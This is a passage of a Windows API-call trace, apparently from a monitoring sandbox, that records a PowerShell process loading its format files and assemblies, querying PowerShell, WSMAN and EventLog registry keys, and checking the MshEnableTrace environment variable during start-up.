	[0144.220] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ccfa0 | out: lpFileInformation=0x1ccfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0144.220] SetErrorMode (uMode=0x1) returned 0x1
	[0144.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0144.220] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd088 | out: phkResult=0x1cd088*=0x31c) returned 0x0
	[0144.220] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd00c, lpData=0x0, lpcbData=0x1cd008*=0x0 | out: lpType=0x1cd00c*=0x1, lpData=0x0, lpcbData=0x1cd008*=0x56) returned 0x0
	[0144.220] CoTaskMemAlloc (cb=0x5a) returned 0x2ed640
	[0144.220] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccfdc, lpData=0x2ed640, lpcbData=0x1ccfd8*=0x56 | out: lpType=0x1ccfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ccfd8*=0x56) returned 0x0
	[0144.220] CoTaskMemFree (pv=0x2ed640) 
	[0144.221] RegCloseKey (hKey=0x31c) returned 0x0
	[0144.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0144.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0144.223] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x5056fc5b, Data2=0x5994, Data3=0x457f, Data4=([0]=0x9f, [1]=0x1e, [2]=0x79, [3]=0xe0, [4]=0x1b, [5]=0xc2, [6]=0x5c, [7]=0x64))) returned 0x0
	[0144.223] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x8fb24aba, Data2=0xfd0e, Data3=0x45ad, Data4=([0]=0x9d, [1]=0x5d, [2]=0xf2, [3]=0xf8, [4]=0x92, [5]=0xad, [6]=0x73, [7]=0xe8))) returned 0x0
	[0144.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0144.224] SetErrorMode (uMode=0x1) returned 0x1
	[0144.224] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0144.224] GetFileType (hFile=0x31c) returned 0x1
	[0144.224] SetErrorMode (uMode=0x1) returned 0x1
	[0144.224] GetFileType (hFile=0x31c) returned 0x1
	[0144.225] ReadFile (in: hFile=0x31c, lpBuffer=0x3bb5a30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3bb5a30*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.225] ReadFile (in: hFile=0x31c, lpBuffer=0x3bb5a30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3bb5a30*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.226] ReadFile (in: hFile=0x31c, lpBuffer=0x3bb5a30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3bb5a30*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.226] ReadFile (in: hFile=0x31c, lpBuffer=0x3bb5a30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3bb5a30*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.227] ReadFile (in: hFile=0x31c, lpBuffer=0x3bb5a30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3bb5a30*, lpNumberOfBytesRead=0x1ccff8*=0xe98, lpOverlapped=0x0) returned 1
	[0144.227] ReadFile (in: hFile=0x31c, lpBuffer=0x3bb5030, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3bb5030*, lpNumberOfBytesRead=0x1ccff8*=0x0, lpOverlapped=0x0) returned 1
	[0144.227] ReadFile (in: hFile=0x31c, lpBuffer=0x3bb5a30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3bb5a30*, lpNumberOfBytesRead=0x1ccff8*=0x0, lpOverlapped=0x0) returned 1
	[0144.227] CloseHandle (hObject=0x31c) returned 1
	[0144.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0144.228] SetErrorMode (uMode=0x1) returned 0x1
	[0144.228] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ccfa0 | out: lpFileInformation=0x1ccfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0144.228] SetErrorMode (uMode=0x1) returned 0x1
	[0144.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0144.228] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd088 | out: phkResult=0x1cd088*=0x31c) returned 0x0
	[0144.228] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd00c, lpData=0x0, lpcbData=0x1cd008*=0x0 | out: lpType=0x1cd00c*=0x1, lpData=0x0, lpcbData=0x1cd008*=0x56) returned 0x0
	[0144.228] CoTaskMemAlloc (cb=0x5a) returned 0x2ed640
	[0144.228] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccfdc, lpData=0x2ed640, lpcbData=0x1ccfd8*=0x56 | out: lpType=0x1ccfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ccfd8*=0x56) returned 0x0
	[0144.228] CoTaskMemFree (pv=0x2ed640) 
	[0144.229] RegCloseKey (hKey=0x31c) returned 0x0
	[0144.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0144.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0144.231] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.231] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x4320870a, Data2=0xe2c7, Data3=0x4f0e, Data4=([0]=0xa2, [1]=0x8, [2]=0xec, [3]=0xd8, [4]=0x93, [5]=0x46, [6]=0x39, [7]=0xd1))) returned 0x0
	[0144.232] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x10d20d81, Data2=0xb755, Data3=0x4b5b, Data4=([0]=0xa8, [1]=0xcd, [2]=0xfb, [3]=0x92, [4]=0x3a, [5]=0x6d, [6]=0x73, [7]=0x92))) returned 0x0
	[0144.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0144.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0144.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0144.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0144.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0144.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0144.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0144.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0144.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0144.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0144.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0144.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0144.821] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0144.821] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.821] CoTaskMemFree (pv=0x23f020) 
	[0144.823] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0144.823] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.823] CoTaskMemFree (pv=0x23f020) 
	[0144.824] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0144.824] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.824] CoTaskMemFree (pv=0x23f020) 
	[0144.826] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0144.826] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.826] CoTaskMemFree (pv=0x23f020) 
	[0144.933] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0144.933] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.933] CoTaskMemFree (pv=0x23f020) 
	[0144.934] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0144.934] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.934] CoTaskMemFree (pv=0x23f020) 
	[0144.934] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0144.934] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.934] CoTaskMemFree (pv=0x23f020) 
	[0144.939] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd298 | out: phkResult=0x1cd298*=0x31c) returned 0x0
	[0144.941] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd19c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd198, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd19c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd198*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0144.941] CoTaskMemFree (pv=0x0) 
	[0144.941] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0144.941] RegEnumValueW (in: hKey=0x31c, dwIndex=0x0, lpValueName=0x2867a0, lpcchValueName=0x1cd248, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1cd248, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0144.941] CoTaskMemFree (pv=0x2867a0) 
	[0144.941] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0144.941] RegEnumValueW (in: hKey=0x31c, dwIndex=0x1, lpValueName=0x2867a0, lpcchValueName=0x1cd248, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1cd248, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0144.941] CoTaskMemFree (pv=0x2867a0) 
	[0144.941] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0144.941] RegEnumValueW (in: hKey=0x31c, dwIndex=0x2, lpValueName=0x2867a0, lpcchValueName=0x1cd248, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1cd248, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0144.941] CoTaskMemFree (pv=0x2867a0) 
	[0144.942] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd22c, lpData=0x0, lpcbData=0x1cd228*=0x0 | out: lpType=0x1cd22c*=0x1, lpData=0x0, lpcbData=0x1cd228*=0x8) returned 0x0
	[0144.942] CoTaskMemAlloc (cb=0xc) returned 0x1b835420
	[0144.942] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd1fc, lpData=0x1b835420, lpcbData=0x1cd1f8*=0x8 | out: lpType=0x1cd1fc*=0x1, lpData="2.0", lpcbData=0x1cd1f8*=0x8) returned 0x0
	[0144.942] CoTaskMemFree (pv=0x1b835420) 
	[0145.205] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1e8 | out: phkResult=0x1cd1e8*=0x320) returned 0x0
	[0145.206] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd0ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd0e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd0ec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd0e8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.206] CoTaskMemFree (pv=0x0) 
	[0145.206] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.206] RegEnumValueW (in: hKey=0x320, dwIndex=0x0, lpValueName=0x2867a0, lpcchValueName=0x1cd198, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1cd198, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0145.206] CoTaskMemFree (pv=0x2867a0) 
	[0145.206] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.206] RegEnumValueW (in: hKey=0x320, dwIndex=0x1, lpValueName=0x2867a0, lpcchValueName=0x1cd198, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1cd198, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0145.206] CoTaskMemFree (pv=0x2867a0) 
	[0145.206] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.206] RegEnumValueW (in: hKey=0x320, dwIndex=0x2, lpValueName=0x2867a0, lpcchValueName=0x1cd198, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1cd198, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0145.206] CoTaskMemFree (pv=0x2867a0) 
	[0145.206] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd17c, lpData=0x0, lpcbData=0x1cd178*=0x0 | out: lpType=0x1cd17c*=0x1, lpData=0x0, lpcbData=0x1cd178*=0x8) returned 0x0
	[0145.206] CoTaskMemAlloc (cb=0xc) returned 0x1b835340
	[0145.206] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd14c, lpData=0x1b835340, lpcbData=0x1cd148*=0x8 | out: lpType=0x1cd14c*=0x1, lpData="2.0", lpcbData=0x1cd148*=0x8) returned 0x0
	[0145.206] CoTaskMemFree (pv=0x1b835340) 
	[0145.208] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0145.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0145.208] CoTaskMemFree (pv=0x23f020) 
	[0145.214] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0145.214] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0145.214] CoTaskMemFree (pv=0x23f020) 
	[0145.222] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd218 | out: phkResult=0x1cd218*=0x338) returned 0x0
	[0145.226] RegQueryInfoKeyW (in: hKey=0x338, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd18c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd188, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd18c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd188*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.226] CoTaskMemFree (pv=0x0) 
	[0145.227] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.227] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x0, lpName=0x2867a0, lpcchName=0x1cd218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.227] CoTaskMemFree (pv=0x2867a0) 
	[0145.227] CoTaskMemFree (pv=0x0) 
	[0145.227] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.227] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x1, lpName=0x2867a0, lpcchName=0x1cd218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.228] CoTaskMemFree (pv=0x2867a0) 
	[0145.228] CoTaskMemFree (pv=0x0) 
	[0145.228] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.228] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x2, lpName=0x2867a0, lpcchName=0x1cd218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.228] CoTaskMemFree (pv=0x2867a0) 
	[0145.228] CoTaskMemFree (pv=0x0) 
	[0145.228] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
